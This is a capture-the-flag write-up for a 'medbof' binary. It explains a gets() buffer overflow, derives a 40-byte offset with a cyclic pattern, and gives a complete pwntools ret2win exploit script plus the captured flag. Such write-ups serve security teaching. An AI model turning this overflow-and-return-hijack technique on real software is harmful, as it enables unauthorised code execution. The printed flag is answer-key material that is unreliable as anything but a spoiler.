This is a 64-bit binary that is not stripped, which means the function names are intact and the reversing process is easier.
The only protection enabled is NX, which makes executing shellcode on the stack impossible, so we have to reuse code that is already in the binary.
gets() is vulnerable to a buffer overflow, so we overflow the buffer and overwrite the saved return address (RIP) with the address of the win function (do_system).
Calculating the offset to overwrite the RIP:
As in the previous challenge (crashme), using gdb with pwndbg and a cyclic pattern we find that the offset is 40.
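How that offset comes out of the cyclic pattern, as an added example that is not part of the original writeup: it re-implements pwntools' cyclic/cyclic_find (de Bruijn sequence over a-z, 4-byte windows) in plain Python and feeds it a constructed crash value standing in for what gdb shows at RSP when the overwritten return address faults.

```python
#!/usr/bin/env python3
"""Re-derive the 40-byte offset with a de Bruijn (cyclic) pattern, pwntools-style."""
import struct

ALPHABET = "abcdefghijklmnopqrstuvwxyz"

def de_bruijn(alphabet=ALPHABET, n=4):
    """B(k, n): every n-byte window occurs exactly once, so a crash value
    read off the stack is a unique key for its offset in the pattern."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []
    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)
    db(1, 1)
    return "".join(alphabet[i] for i in out).encode()

PATTERN = de_bruijn()   # computed once, 26**4 bytes, same order as pwntools' cyclic()

def cyclic(length):
    """First `length` bytes of the pattern, what you would send instead of 'A'*N."""
    return PATTERN[:length]

def cyclic_find(value, n=4):
    """Offset of a crash-time stack/register value inside the pattern.
    Accepts the integer gdb prints (little-endian) or the raw bytes."""
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    return PATTERN.find(value[:n])

def simulate_overflow(buffer_size=40, pattern_len=100):
    """Constructed stand-in for the crash: gets() writes the pattern past the
    buffer, so the 8 bytes after it are what lands in the saved return address."""
    frame = cyclic(pattern_len)[:buffer_size + 8]
    return frame[buffer_size:buffer_size + 8]

if __name__ == "__main__":
    crash = simulate_overflow()
    print(crash, cyclic_find(crash))          # b'kaaalaaa' 40
    print(cyclic_find(0x6161616c6161616b))    # same value as gdb would show: 40
```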
#!/usr/bin/env python3
from pwn import *
import sys

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)

# Set up pwntools for the correct architecture
exe = './medbof'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)

# Commands gdb runs when the script is started with GDB=1
# (the original script referenced gdbscript without defining it)
gdbscript = '''
break main
continue
'''

# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'info'

#===========================================================
# EXPLOIT GOES HERE
#===========================================================

io = start()

offset = 40
ret = 0x4004d1  # ropper --file=medbof --search="ret"

payload = flat(
    b'A' * offset,               # fill the buffer up to the saved return address
    ret,                         # extra ret gadget fixes the 16-byte stack alignment issue
    elf.symbols["do_system"]     # ret2win
)

io.sendlineafter(b'a little harder this time', payload)
io.interactive()
flag{getting_better_at_hacking_binaries_i_see...}